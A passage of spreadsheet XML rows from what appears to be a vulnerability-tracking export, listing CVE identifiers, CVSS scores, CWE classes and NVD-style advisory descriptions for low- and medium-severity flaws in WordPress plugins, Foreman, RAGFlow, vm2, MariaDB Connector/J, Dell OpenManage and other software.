        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91009</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>The Active Woot Products Tables for WooCommerce. 100% FREE  WordPress plugin before 2.1.3 does not have authorisation and CSRF checks in some of its AJAX actions, allowing any authenticated users, such as subscriber, to change the title of arbitrary posts, pages and products.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91009</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91010</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>The Invisible Anti-Spam &amp; CAPTCHA — reCAPTCHA Alternative for All Forms WordPress plugin before 5.1.1 does not check the user's capabilities in its message deletion AJAX action, and only tests that a nonce parameter is present rather than validating it, allowing any authenticated user, such as a subscriber, to permanently delete every form submission the Invisible Anti-Spam &amp; CAPTCHA — reCAPTCHA Alternative for All Forms WordPress plugin before 5.1.1 has stored.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91010</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92839</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-174</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Canva Desktop before v1.125.0 performed double decoding in the deeplink handler. A threat actor could cause the application to load arbitrary same-origin content under the user’s session.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92839</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92881</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-369, CWE-404</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in vgmstream. The affected element is the function init_vgmstream_awb_memory of the file src/meta/awb.c of the component AWB parser. Such manipulation leads to divide by zero. The attack can be executed remotely. The name of the patch is ae37662ad626254ddd96ad69ac263792d7a92024. A patch should be applied to remediate this issue.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92881</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92893</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the foreman_ansible plugin's Ansible inventory API. The controller builds its host query using an unscoped Host.where call that does not enforce the search filter associated with the caller's view_hosts permission. An authenticated user whose host visibility is restricted by a permission filter can supply arbitrary host IDs within their organization and receive the full Ansible inventory for those hosts, including parameter values marked as hidden.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92893</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92894</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the foreman_ansible plugin's Ansible override values API. The destroy action resolves the target LookupValue record by ID without verifying it belongs to an AnsibleVariable the caller is authorized to edit. An authenticated user with the edit_ansible_variables permission can delete any LookupValue by ID, including override values for Ansible variables outside their permission filter scope and override values belonging to Puppet smart class parameters.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92894</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92904</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the foreman_remote_execution plugin's template invocations controller. The show_template_invocation_by_host action resolves the job invocation by ID without evaluating the caller's view_job_invocations permission filter against the record. An authenticated user whose job invocation visibility is restricted by a permission filter can enumerate job invocation IDs and read the live output, rendered script, and input values for other users' job invocations within their own organizations.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92904</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93013</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>RAGFlow through 0.27.2 contains a path traversal vulnerability in the dev_insert_chunks_from_file and dev_insert_metadata_from_file endpoints that allows authenticated attackers to read arbitrary files by supplying absolute file paths in the file_path parameter. Attackers with valid access tokens can exploit missing path validation to read any file accessible to the service, with disclosure limited to files matching expected JSON structures that are then written to datasets.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93013</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93307</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-789</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in O-RAN-SC SMO OAM 2025-06-10. Affected is an unknown function of the component VES Collector. Such manipulation of the argument additionalFields.padding leads to uncontrolled memory allocation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through a bug report but has not responded yet.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93307</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81441</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Denial of service.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81441</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92949</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-471</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.9.6 before 3.11.7 fail to properly restrict access to accessor properties on frozen objects, allowing sandboxed scripts to bypass vm.freeze() and vm.readonly() protections. Attackers can use Object.getOwnPropertyDescriptor() or __lookupSetter__() to extract and invoke host object setters directly, mutating properties the embedder explicitly marked read-only.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92949</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12284</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Mattermost Desktop App versions &lt;=6.2 6.2.2.0 fails to validate the IPC sender in the leaveCall handler which allows a malicious or compromised Mattermost server (or a user with script access to a connected server view) to disconnect an active call belonging to a different connected server via the desktopAPI.leaveCall IPC message. Mattermost Advisory ID: MMSA-2026-00699</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12284</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61700</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr">
        <is>
          <t>maven:org.mariadb.jdbc:mariadb-java-client</t>
        </is>
      </c>
      <c r="M372" s="5" t="inlineStr">
        <is>
          <t>2.7.14, 3.3.5, 3.4.3, 3.5.9</t>
        </is>
      </c>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, ClientMessage.readPacket processes a server-initiated LOCAL INFILE protocol packet 0xfb without enforcing allowLocalInfile=false. When an application sends a LOAD DATA LOCAL INFILE COM_QUERY, a rogue or man-in-the-middle server can echo the same filename and cause the connector to transmit that file despite the disabled option. The server cannot redirect the request to an arbitrary path and can receive only the exact file already selected by the application, so exploitation requires an application that actively loads sensitive data over an untrusted connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61700</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78426</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>The NeuVector JWT verifier accepts noncanonical Base64URL encodings of the same RSA signature field. An attacker holding a valid JWT that has not expired, but was logged out of NeuVector, can continue using the non-expired token with equivalent spelling of the RSA signature field until the token validity expires.</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78426</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81438</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains Use of a Broken or Risky Cryptographic Algorithm vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81438</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81439</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Incorrect Authorization vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="T375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81439</t>
        </is>
      </c>
    </row>
    <row r="376">
